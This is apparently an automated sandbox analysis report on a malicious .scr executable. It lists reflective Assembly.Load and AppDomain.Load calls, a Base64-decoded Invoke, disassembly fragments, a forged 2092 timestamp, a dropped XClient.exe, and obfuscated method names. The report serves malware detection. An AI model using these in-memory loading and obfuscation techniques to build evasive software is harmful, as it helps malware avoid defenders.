Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: EcGTN38sUvr8r
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.4091d60.7.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.cs .Net Code: hp9bPiOkD0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.cs .Net Code: hp9bPiOkD0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.cs .Net Code: hp9bPiOkD0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.58c0000.8.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: EcGTN38sUvr8r
Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe Static PE information: 0xE70462D1 [Sun Oct 26 01:52:17 2092 UTC]
Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe Code function: 3_2_066936D7 push ebx; iretd 3_2_066936DA
Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe Code function: 3_2_06690890 push 00000006h; ret 3_2_066908A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04BD647D pushad ; retf 4_2_04BD6491
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04BD42AD push ebx; ret 4_2_04BD42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08BD7210 push esp; iretd 4_2_08BD7569
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041BE421 pushad ; ret 7_2_041BE422
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041BE5C1 pushad ; ret 7_2_041BE5C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041BE613 pushad ; ret 7_2_041BE61A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041BE610 pushad ; ret 7_2_041BE612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041B8739 push cs; ret 7_2_041B873A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041B9769 push ss; ret 7_2_041B976A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041B878B push cs; ret 7_2_041B8792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041B8788 push cs; ret 7_2_041B878A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041B97B9 push ss; ret 7_2_041B97BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041BB08C push ecx; retn 0007h 7_2_041BB09A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_041B634D push eax; ret 7_2_041B6361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC0B push ds; ret 7_2_041BAC0E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC09 push ds; ret 7_2_041BAC0A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC0F push ds; ret 7_2_041BAC12
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC49 push ds; ret 7_2_041BAC4A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BDC93 push esi; ret 7_2_041BDC9A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BDC90 push esi; ret 7_2_041BDC92
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BDCE1 push edi; ret 7_2_041BDCE2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B980B push ss; ret 7_2_041B9812
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9808 push ss; ret 7_2_041B980A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9833 push ss; ret 7_2_041B983A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9831 push ss; ret 7_2_041B9832
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9859 push ss; ret 7_2_041B985A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B98B3 push ss; ret 7_2_041B98BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B98B0 push ss; ret 7_2_041B98B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9979 push ss; ret 7_2_041B997A
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: section name: .text entropy: 7.62631097980793
              Source: XClient.exe.3.drStatic PE information: section name: .text entropy: 7.62631097980793
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, OEGyOZzp9CU9Z.csHigh entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, xEwUvc4BlwXCJ.csHigh entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, qMGvLJvouSdkL.csHigh entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 3QiiXqkghrMk1.csHigh entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, y42W1bnvO6P0K.csHigh entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.csHigh entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, yI26puFLQ4OeW.csHigh entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Udui5apYySouKBMT14.csHigh entropy of concatenated method names: 'Af1PYkPV6', 'PR4ufbV2o', 'Na8eggfVB', 'tccGmNNn0', 'Nc7U4t7ix', 'tMVwLEZKQ', 'oYfmOweGWPW0OMjSpl', 'iyUc388o7EydOdRx0F', 'wKm4rI2Eo', 'HNTWlaN5G'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, ka7sYHFqq7dPvT5nVb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gBvp0IHps2', 'koop5whEy3', 'i4upz0fhfI', 'gN0SaF6xyS', 'JsaS6EMuqE', 'LkvSprNFgW', 'PXKSSktkcR', 'cD7SiRsLfYtbOl2FpPc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, ADkFnNn5Tlm0QIaDOi.csHigh entropy of concatenated method names: 'hgoCmPpjRZ', 'dDZCUmYFEj', 'WL1CDZDgrS', 'dfRCZ0X1mJ', 'JBqChoVK5L', 'eXXCqbR7ed', 'vtbC2g5Psq', 'DNpCVx0IxH', 'S1PCljQANs', 'vhuCfdWH72'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, DjlwRxU4LiRvxgFpeJ.csHigh entropy of concatenated method names: 'pCHFuVEjIZ', 'xnmFeuCUkC', 'ek2Fmj00MP', 'UocFURHFt2', 't3OFkwu1tm', 'BmJFssUOfJ', 'NtVF7gqnt8', 'YZdF4uv1Pd', 'Ms7F3II7fa', 'et7FWFVdsM'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, XYhn0PmGM2d0vqBguD.csHigh entropy of concatenated method names: 'JtQ8txXQtR', 'MkX8RcxJUE', 'x0Z8cIuZYI', 'yt88XWNABE', 'X3F8LfmjfE', 'JIT8rT6wVS', 'DGE8y2uHYV', 'Ipb8QuLZQD', 'L8Q80gj6rM', 'A8785oPllC'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, ovuju6DaxiV8v3NgFP.csHigh entropy of concatenated method names: 'uyLAKTa90H', 'URuA8ygFvI', 'AJCAHYRQJe', 'i8fA1T3ijb', 'zK7AB23JuV', 'TcvHLQitbn', 'txCHrBsHuh', 'BYJHylSDQ4', 'H89HQpLlVu', 'TInH0T1m66'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, dnnWTVcWiOSUoMKxjl.csHigh entropy of concatenated method names: 'ToString', 'nr7sfKOZhc', 'TwDsZTlW11', 'DZYsNp51hy', 'TJCshaQDPO', 'Fj0sqbORXS', 'QBnsOIIcLO', 'HXes2yQqQd', 'VpxsVJdWTi', 'EAasMSbsYt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, bYvEAE0FmDgKllXo6e.csHigh entropy of concatenated method names: 'TOy3DY1W7g', 'UuM3ZXaJbb', 'Rk03NcH8Rw', 'wix3hMja66', 'nRj3q2bsej', 'IHD3OdBTPm', 'OCa32INt6R', 'CPA3VSwS0h', 'CTm3MLxedS', 'T0c3lobFVH'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, SCIXNr23CfXNXKcjQ5.csHigh entropy of concatenated method names: 'Yd71EfZgm2', 'rrJ1FD4ysE', 'BCj1AeD92I', 'B2CA5wg6ak', 'mL2AziwQBJ', 'nA41a74gmD', 'Daa16lWfSn', 'Wci1pHeCFn', 'MOv1SjWp4v', 'roy1b1DsEt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Ee1KgtXRbhccZ7sMGe.csHigh entropy of concatenated method names: 'Pwt7vWXGle', 'jo97d8qFRf', 'ToString', 'RLG7EeScyT', 'n0F78waNBI', 'YbH7FkR6jU', 'P8H7HeyCAC', 'c567Atw0wI', 'NX171OpfU4', 'On67BqoyTZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, a2rhWx5dUBFm60NB8M.csHigh entropy of concatenated method names: 'JLlWFBMkRs', 'TPoWHupbbU', 'SBJWAXUX5B', 'atuW1h8XUR', 'wTcW3WppBA', 'IUDWBShMY8', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csHigh entropy of concatenated method names: 'w80SKpd1QE', 'TfvSEuZKlk', 'cpZS8Jo0N9', 'cUiSFgVcCC', 'NVrSH5NU0H', 'LiISAGMyp2', 'mF0S1Q1TxP', 'JaESBfGfOf', 'oWRST14Zsa', 'lc2SvByV4B'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, LL5idJMlpFFnUZLDnT.csHigh entropy of concatenated method names: 'gp11xAj6Si', 'qQU19ytUvk', 'kFc1PstPKN', 'rGi1uBLR44', 'oFv1infXxG', 'FXi1eVpr7C', 'Mrf1Ge0Uvy', 'QUA1mZOXne', 't3h1U2E80v', 'zNt1wipJMb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, S74R94tKMGmNqIEyqQ.csHigh entropy of concatenated method names: 'E2TklvHnD6', 'NPSkoj5LMC', 'zXfktLShOu', 'YS2kRK8YYD', 'hrYkZ6WXlr', 'PgmkNPcdH4', 's99khyeooU', 'SYmkqZAieM', 'w3TkOhBUJV', 'PsIk2ZmsVN'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, tyOgSPrRXGoq56AsYx.csHigh entropy of concatenated method names: 'Yej7QlA0E2', 'uRg75oZ2y5', 'QNN4aQDsVJ', 'M2h46V3wKe', 't0K7fhF1MS', 'TS47oE7PTJ', 'zFO7nMmpfM', 'xDg7txYso3', 'vgP7RvaWFO', 'Lch7cwRZkc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Vw7f8p8oGS4wsJPMJo.csHigh entropy of concatenated method names: 'Dispose', 'aPu60qaXnZ', 'w7dpZe7aV1', 'nUky64iXsU', 'cMk65cckeP', 'Nwj6zF1nab', 'ProcessDialogKey', 'XZppaYvEAE', 'hmDp6gKllX', 'P6eppa2rhW'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, xTGpsxZB81EqjVRX17.csHigh entropy of concatenated method names: 'EeAN11hVnuuXFa7Ot2G', 'YL7ZNWhkZTxRdPwrwNF', 'FkSA40HCZO', 'jwDA3MK0uM', 'as5AWXPAg5', 'M63C94h9imA9GPTqgpJ', 'XqJmJehIFlQXUm3WDv1'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, QxUVgL66mMgmFeb54i1.csHigh entropy of concatenated method names: 'yhnW5yudus', 'bb5WzNd6io', 'BgngaPtahW', 'oQyg6GZlLB', 'alYgp4yxbV', 'oATgSpvCUT', 'nJugbEaRNp', 'oDvgK0xmSo', 'CbggEXMi0s', 'hceg8I9FgI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, jRAAR5zRlVId4oZWmj.csHigh entropy of concatenated method names: 'fGHWe22uFx', 'KxeWme0oiu', 'kZpWUJX7B1', 'oXNWDDWrjk', 'td6WZP8pNg', 'nUYWhsSnyu', 'bV0WqLt50V', 'NajWYRGiud', 'eUhWxVmoxH', 'SFWW9lmArK'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, aLE6e0yUoaPuqaXnZp.csHigh entropy of concatenated method names: 'lU83koOENm', 'G0d37MAwH2', 'xvl336BAp9', 'zIu3gxxhrc', 'ODQ3j69pTp', 'pqY3Y1v5Bx', 'Dispose', 'qiD4ED7MKE', 'TxJ48k9sBO', 'QMX4FGXxLg'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, TyDfo1bY3ZrsEhlwFm.csHigh entropy of concatenated method names: 'LEQ61Yhn0P', 'CM26Bd0vqB', 'x4L6viRvxg', 'gpe6dJ0JYg', 'c7A6krMkvu', 'vu66saxiV8', 'awPQbno2xCjjuEUKWs', 'PQ7Q6KOsvX2psFAINI', 'snp66h2MSF', 'gAj6SFpTdn'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, XJYgVjwL3PMpoS7ArM.csHigh entropy of concatenated method names: 'DngHiIeN65', 'avbHGrDEIl', 'MRwFNkOx5E', 'ileFhuRStQ', 'fDUFqfvROq', 'qxGFOJJKsC', 'dOUF22qm4Q', 'gyFFVbIDdG', 'ls6FMfRcZx', 'rIAFl2xQM4'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, gfpQDs6aGwak9n0C4Oi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ftyWfKZ3sv', 'YyKWoens9f', 'JqSWn4aldt', 'YsuWtZ2tR7', 'U7PWRRH0Br', 'nniWc55UHK', 'e6DWXCF90H'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, PyUexM6byOoMxTLOSna.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DETI3YPc2N', 'hs8IW3uoER', 'XChIgSciVH', 'UEOIIUa0I4', 'bj9Ij5tbNa', 'k2jIJhbn5Y', 'QFEIYiZMTs'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Udui5apYySouKBMT14.csHigh entropy of concatenated method names: 'Af1PYkPV6', 'PR4ufbV2o', 'Na8eggfVB', 'tccGmNNn0', 'Nc7U4t7ix', 'tMVwLEZKQ', 'oYfmOweGWPW0OMjSpl', 'iyUc388o7EydOdRx0F', 'wKm4rI2Eo', 'HNTWlaN5G'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, ka7sYHFqq7dPvT5nVb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gBvp0IHps2', 'koop5whEy3', 'i4upz0fhfI', 'gN0SaF6xyS', 'JsaS6EMuqE', 'LkvSprNFgW', 'PXKSSktkcR', 'cD7SiRsLfYtbOl2FpPc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, ADkFnNn5Tlm0QIaDOi.csHigh entropy of concatenated method names: 'hgoCmPpjRZ', 'dDZCUmYFEj', 'WL1CDZDgrS', 'dfRCZ0X1mJ', 'JBqChoVK5L', 'eXXCqbR7ed', 'vtbC2g5Psq', 'DNpCVx0IxH', 'S1PCljQANs', 'vhuCfdWH72'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, DjlwRxU4LiRvxgFpeJ.csHigh entropy of concatenated method names: 'pCHFuVEjIZ', 'xnmFeuCUkC', 'ek2Fmj00MP', 'UocFURHFt2', 't3OFkwu1tm', 'BmJFssUOfJ', 'NtVF7gqnt8', 'YZdF4uv1Pd', 'Ms7F3II7fa', 'et7FWFVdsM'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, XYhn0PmGM2d0vqBguD.csHigh entropy of concatenated method names: 'JtQ8txXQtR', 'MkX8RcxJUE', 'x0Z8cIuZYI', 'yt88XWNABE', 'X3F8LfmjfE', 'JIT8rT6wVS', 'DGE8y2uHYV', 'Ipb8QuLZQD', 'L8Q80gj6rM', 'A8785oPllC'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, ovuju6DaxiV8v3NgFP.csHigh entropy of concatenated method names: 'uyLAKTa90H', 'URuA8ygFvI', 'AJCAHYRQJe', 'i8fA1T3ijb', 'zK7AB23JuV', 'TcvHLQitbn', 'txCHrBsHuh', 'BYJHylSDQ4', 'H89HQpLlVu', 'TInH0T1m66'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, dnnWTVcWiOSUoMKxjl.csHigh entropy of concatenated method names: 'ToString', 'nr7sfKOZhc', 'TwDsZTlW11', 'DZYsNp51hy', 'TJCshaQDPO', 'Fj0sqbORXS', 'QBnsOIIcLO', 'HXes2yQqQd', 'VpxsVJdWTi', 'EAasMSbsYt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, bYvEAE0FmDgKllXo6e.csHigh entropy of concatenated method names: 'TOy3DY1W7g', 'UuM3ZXaJbb', 'Rk03NcH8Rw', 'wix3hMja66', 'nRj3q2bsej', 'IHD3OdBTPm', 'OCa32INt6R', 'CPA3VSwS0h', 'CTm3MLxedS', 'T0c3lobFVH'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, SCIXNr23CfXNXKcjQ5.csHigh entropy of concatenated method names: 'Yd71EfZgm2', 'rrJ1FD4ysE', 'BCj1AeD92I', 'B2CA5wg6ak', 'mL2AziwQBJ', 'nA41a74gmD', 'Daa16lWfSn', 'Wci1pHeCFn', 'MOv1SjWp4v', 'roy1b1DsEt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Ee1KgtXRbhccZ7sMGe.csHigh entropy of concatenated method names: 'Pwt7vWXGle', 'jo97d8qFRf', 'ToString', 'RLG7EeScyT', 'n0F78waNBI', 'YbH7FkR6jU', 'P8H7HeyCAC', 'c567Atw0wI', 'NX171OpfU4', 'On67BqoyTZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, a2rhWx5dUBFm60NB8M.csHigh entropy of concatenated method names: 'JLlWFBMkRs', 'TPoWHupbbU', 'SBJWAXUX5B', 'atuW1h8XUR', 'wTcW3WppBA', 'IUDWBShMY8', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csHigh entropy of concatenated method names: 'w80SKpd1QE', 'TfvSEuZKlk', 'cpZS8Jo0N9', 'cUiSFgVcCC', 'NVrSH5NU0H', 'LiISAGMyp2', 'mF0S1Q1TxP', 'JaESBfGfOf', 'oWRST14Zsa', 'lc2SvByV4B'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, LL5idJMlpFFnUZLDnT.csHigh entropy of concatenated method names: 'gp11xAj6Si', 'qQU19ytUvk', 'kFc1PstPKN', 'rGi1uBLR44', 'oFv1infXxG', 'FXi1eVpr7C', 'Mrf1Ge0Uvy', 'QUA1mZOXne', 't3h1U2E80v', 'zNt1wipJMb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, S74R94tKMGmNqIEyqQ.csHigh entropy of concatenated method names: 'E2TklvHnD6', 'NPSkoj5LMC', 'zXfktLShOu', 'YS2kRK8YYD', 'hrYkZ6WXlr', 'PgmkNPcdH4', 's99khyeooU', 'SYmkqZAieM', 'w3TkOhBUJV', 'PsIk2ZmsVN'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, tyOgSPrRXGoq56AsYx.csHigh entropy of concatenated method names: 'Yej7QlA0E2', 'uRg75oZ2y5', 'QNN4aQDsVJ', 'M2h46V3wKe', 't0K7fhF1MS', 'TS47oE7PTJ', 'zFO7nMmpfM', 'xDg7txYso3', 'vgP7RvaWFO', 'Lch7cwRZkc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Vw7f8p8oGS4wsJPMJo.csHigh entropy of concatenated method names: 'Dispose', 'aPu60qaXnZ', 'w7dpZe7aV1', 'nUky64iXsU', 'cMk65cckeP', 'Nwj6zF1nab', 'ProcessDialogKey', 'XZppaYvEAE', 'hmDp6gKllX', 'P6eppa2rhW'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, xTGpsxZB81EqjVRX17.csHigh entropy of concatenated method names: 'EeAN11hVnuuXFa7Ot2G', 'YL7ZNWhkZTxRdPwrwNF', 'FkSA40HCZO', 'jwDA3MK0uM', 'as5AWXPAg5', 'M63C94h9imA9GPTqgpJ', 'XqJmJehIFlQXUm3WDv1'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, QxUVgL66mMgmFeb54i1.csHigh entropy of concatenated method names: 'yhnW5yudus', 'bb5WzNd6io', 'BgngaPtahW', 'oQyg6GZlLB', 'alYgp4yxbV', 'oATgSpvCUT', 'nJugbEaRNp', 'oDvgK0xmSo', 'CbggEXMi0s', 'hceg8I9FgI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, jRAAR5zRlVId4oZWmj.csHigh entropy of concatenated method names: 'fGHWe22uFx', 'KxeWme0oiu', 'kZpWUJX7B1', 'oXNWDDWrjk', 'td6WZP8pNg', 'nUYWhsSnyu', 'bV0WqLt50V', 'NajWYRGiud', 'eUhWxVmoxH', 'SFWW9lmArK'
